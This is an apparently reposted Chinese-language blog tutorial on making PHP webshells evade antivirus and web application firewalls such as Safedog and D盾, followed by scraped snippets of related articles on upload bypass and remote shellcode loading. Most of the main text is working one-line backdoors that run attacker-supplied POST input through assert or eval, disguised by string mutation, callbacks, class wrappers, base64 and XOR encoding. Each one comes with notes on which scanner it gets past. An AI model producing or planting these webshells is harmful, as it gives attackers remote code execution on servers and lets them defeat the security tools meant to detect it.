Webshell免杀绕过waf

0x01 前言#

尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧

0x02 目录#

  1. 关于eval 于 assert
  2. 字符串变形
  3. 定义函数绕过
  4. 回调函数
  5. 回调函数变形
  6. 特殊字符干扰
  7. 数组
  8. 编码绕过
  9. 无字符特征马
  10. PHP7.1后webshell何去何从
  11. 总结

0x03 关于eval 于 assert#

关于eval函数在php给出的官方说明是

eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用
可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号(),让系统认为该值是一个函数,从而当做函数来执行
通俗的说比如你 <?php $a=eval;$a() ?> 这样是不行的 也造就了用eval的话达不到assert的灵活,但是在php7.1以上assert已经不行

关于assert函数

assert() 回调函数在构建自动测试套件的时候尤其有用,因为它们允许你简易地捕获传入断言的代码,并包含断言的位置信息。 当信息能够被其他方法捕获,使用断言可以让它更快更方便!

0x04 字符串变形#

字符串变形多数用于BYPASS安全狗,相当对于D盾,安全狗更加重视"形"
一个特殊的变形就能绕过安全狗,看看PHP手册,有着很多关于操作字符串的函数

ucwords() //函数把字符串中每个单词的首字符转换为大写。ucfirst() //函数把字符串中的首字符转换为大写。trim() //函数从字符串的两端删除空白字符和其他预定义字符。substr_replace() //函数把字符串的一部分替换为另一个字符串substr() //函数返回字符串的一部分。strtr() //函数转换字符串中特定的字符。strtoupper() //函数把字符串转换为大写。strtolower() //函数把字符串转换为小写。strtok() //函数把字符串分割为更小的字符串str_rot13() //函数对字符串执行 ROT13 编码。

由于PHP的灵活性操作字符串的函数很多,我这里就不一一列举了

substr_replace() 函数变形assert 达到免杀的效果

<?php$a = substr_replace("assexx","rt",4);$a($_POST[‘x‘]);?>

其他函数类似 不一一列举了

0x05 定义函数绕过#

定义一个函数把关键词分割达到bypass效果

<?php function kdog($a){    $a($_POST[‘x‘]);}kdog(assert);?>

反之

<?php function kdog($a){    assert($a);}kdog($_POST[x]);?>

效果一样,这种绕过方法,对安全狗还是比较有效的 在d盾面前就显得小儿科了 ,不过后面会讲到如何用定义函数的方法来 绕过d盾

0x05 回调函数#

call_user_func_array()call_user_func()array_filter() array_walk()  array_map()registregister_shutdown_function()register_tick_function()filter_var() filter_var_array() uasort() uksort() array_reduce()array_walk() array_walk_recursive()

回调函数大部分已经被安全软件加入全家桶套餐 所以找到一个生僻的不常用的回调函数来执行 比如

<?php forward_static_call_array(assert,array($_POST[x]));?>

这个函数能过狗,但是D盾显示是一级

0x05 回调函数变形#

前面说过众多回调函数已经被加入豪华套餐了,怎么绕过呢,其实也很简单 那就是定义个函数 或者类来调用

定义一个函数

<?phpfunction test($a,$b){    array_map($a,$b);}test(assert,array($_POST[‘x‘]));?> 

定义一个类

<?phpclass loveme {    var $a;    var $b;    function __construct($a,$b) {        $this->a=$a;        $this->b=$b;    }    function test() {       array_map($this->a,$this->b);    }}$p1=new loveme(assert,array($_POST[‘x‘]));$p1->test();?>

0x06 特殊字符干扰#

特殊字符干扰,要求是能干扰到杀软的正则判断,还要代码能执行,网上广为流传的连接符

初代版本

<?php$a = $_REQUEST[‘a‘];$b = null;eval($b.$a);?>

不过已经不能免杀了,利用适当的变形即可免杀 如

<?php$a = $_POST[‘a‘];$b = "\n";eval($b.=$a);?>

其他方法大家尽情发挥如"\r\n\t",函数返回,类,等等

除了连接符号 还有个命名空间的东西 \ 具体大家可以看看php手册

<?phpfunction dog($a){
    \assert($a);}dog($_POST[x]);?>

当然还有其他的符号熟读PHP手册就会有不一样的发现

0x07 数组#

把执行代码放入数组中执行绕过

<?php$a = substr_replace("assexx","rt",4);$b=[‘‘=>$a($_POST[‘q‘])];?>

多维数组

<?php$b = substr_replace("assexx","rt",4);$a = array($arrayName = array(‘a‘ => $b($_POST[‘q‘])));?>

0x08 类#

说到类肯定要搭配上魔术方法比如 __destruct()__construct()
直接上代码

<?php class me{  public $a = ‘‘;  function __destruct(){    assert("$this->a");  }}$b = new me;$b->a = $_POST[‘x‘];?>

用类把函数包裹,D盾对类查杀较弱

0x09 编码绕过#

用php的编码函数,或者用异或等等
简单的base64_decode,其中因为他的正则匹配可以加入一些下划线干扰杀软

<?php$a = base64_decode("YXNz+ZX____J____0");$a($_POST[x]);?>

异或

<?php$a= ("!"^"@").‘ssert‘;$a($_POST[x]);?>

0x9 无字符特征马#

对于无特征马这里我的意思是 无字符特征

  1. 利用异或,编码等方式 例如p神博客的
<?php$_=(‘%01‘^‘`‘).(‘%13‘^‘`‘).(‘%13‘^‘`‘).(‘%05‘^‘`‘).(‘%12‘^‘`‘).(‘%14‘^‘`‘); // $_=‘assert‘;$__=‘_‘.(‘%0D‘^‘]‘).(‘%2F‘^‘`‘).(‘%0E‘^‘]‘).(‘%09‘^‘]‘); // $__=‘_POST‘;$___=$$__;$_($___[_]); // assert($_POST[_]);
  1. 利用正则匹配字符 如Tab等  然后转换为字符
  2. 利用POST包获取关键参数执行 例如
<?php$decrpt = $_POST[‘x‘];$arrs = explode("|", $decrpt)[1];$arrs = explode("|", base64_decode($arrs));call_user_func($arrs[0],$arrs[1]);?>

0x10 PHP7.1后webshell何去何从#

在php7.1后面我们已经不能使用强大的assert函数了用eval将更加注重特殊的调用方法和一些字符干扰,后期大家可能更加倾向使用大马

总结#

对于安全狗杀形,d盾杀参的思路来绕过。生僻的回调函数,特殊的加密方式,以及关键词的后传入都是不错的选择。
对于关键词的后传入对免杀安全狗,d盾,河马 等等都是不错的,后期对于菜刀的轮子,也要走向高度的自定义化
用户可以对传出的post数据进行自定义脚本加密,再由webshell进行解密获取参数,那么以现在的软WAF查杀能力
几乎为0,安全软件也需要与时俱进了。

原文地址:https://www.cnblogs.com/-qing-/p/10631414.html

时间: 2024-11-05 16:42:35

Webshell免杀绕过waf的相关文章

[9期]软WAF上传绕过+webshell免杀

安全狗上传绕过 思路: 1.扰乱编码 form-data 替换成 ~form-data           form-data    改成 f+orm-data form-data    改成 form-d+ata          form-data   替换成   " filename="xxx"   改成  filename=xxx; 增减空格 对Content-Disposition,Content-Type,name,filename,form-data http参

远程加载shellcode实现分离免杀

客户端: #include <stdio.h> #include <iostream> #include <WinSock2.h> #pragma comment(lib, "ws2_32.lib") //添加ws2_32动态库 #pragma warning(disable:4996) //忽略旧函数使用的警告 using namespace std; int main(int argc, char *argv[]) { const int BUF

绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)

这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法. 思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测. 废话不多说,切入正题.... 1.实验环境: Windows Server 2003. Apache/2.4.18.PHP/5.3.29.网站安全狗(Apache版)V3.5.12048 2.用于文件上传的PHP源码: <?php $path = dirname(__FILE__) . '/upload/'; $rand = rand(0,30);

PHP一句话木马Webshell变形免杀总结

0×00 前言 大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还请看官拍砖. 0×01 字符串上的舞蹈 一般标准的一句话Webshell是利用PHP的eval函数,动态执行其他函数功能.其标准的形式如下: @eval ($_POST[xxxxx]); 很明显的eval会成为静态特征码Webshell扫描工具的关键字.加上一点小技巧,我们让其动态传入,或者

php大马免杀技巧 | bypass waf

Part 1 前言 Part 2 免杀 执行代码 eval 或 preg_replace的/e修饰符来执行大马代码. $a = 'phpinfo();'; eval($a); //eval执行php代码 编码 如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码. eval_gzinflate_base64类型加密与解密: http://www.zhuisu.net/tool/phpencode.php https://www.mobilefish.com/services/ev

PHP一句话过狗、卫士、D盾等免杀思路!

原文转载于:http://www.legendsec.org/1701.html 觉得写得还算蛮科普的. 00x1.关键字拆分.         比如assert,可以写成 'a'.'ss'.'e'.'r'.'t'这样.         总结:这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法. 00x2.可变变量.引用.可变函数. 可变变量  比如$a=$_POST['x'];$b='a';@eval($$b);        测试结果:        总结:这种方法对狗等WAF可以

【干货】记一次WAF对抗赛详解&amp;全方位绕过WAF

0x01 preview 上个星期参加了某巨头厂商承办的挑战赛,比赛周期48小时,题目是成功渗透在安全宝保护下的五个通用cms靶场,其中包括论坛.商城.资源网站等 从靶场布置来看很明显是在测试安全宝对于几种不同类型cms的对攻击的防御能力. 这样的比赛模式区别于常见的CTF线上模式稍有不同,实战味道较强.常规的CTF在Web题目上面主要考察的是漏洞挖掘和利用,难点一般凸显在发现难和利用 难.而此次靶场中的环境在网上都能找到相关公开漏洞,利用方式较简单,但是我对抗的目标不是存在漏洞的web应用,而

20169217 2016-2017-2 《网络攻防实践》免杀技术学习总结

1.基础问题回答 (1)杀软是如何检测出恶意代码的? 恶意代码与其检测是一个猫捉老鼠的游戏,单从检测的角度来说.反恶意代码的脚步总是落后于恶意代码的发展,是被动的.目前基于主机的恶意代码检测方法主要有反恶意代码软件.完整性校验法以及手动检测,基于网络的检测方法主要有基于神经网络".基于模糊识别"等方法,本文主要讨论基于主机的检测.  恶意代码分析方法  静态分析方法 是指在不执行二进制程序的条件下进行分析,如反汇编分析,源代码分析,二进制统计分析,反编译等,属于逆向工程分析方法. (1

Bypass AV meterpreter免杀技巧

0x01 meterpreter简介 MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单. 需要说明的是meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没有可执行命令,或者会话建立执行help之后发现缺少命令,经常出现什么sending stager er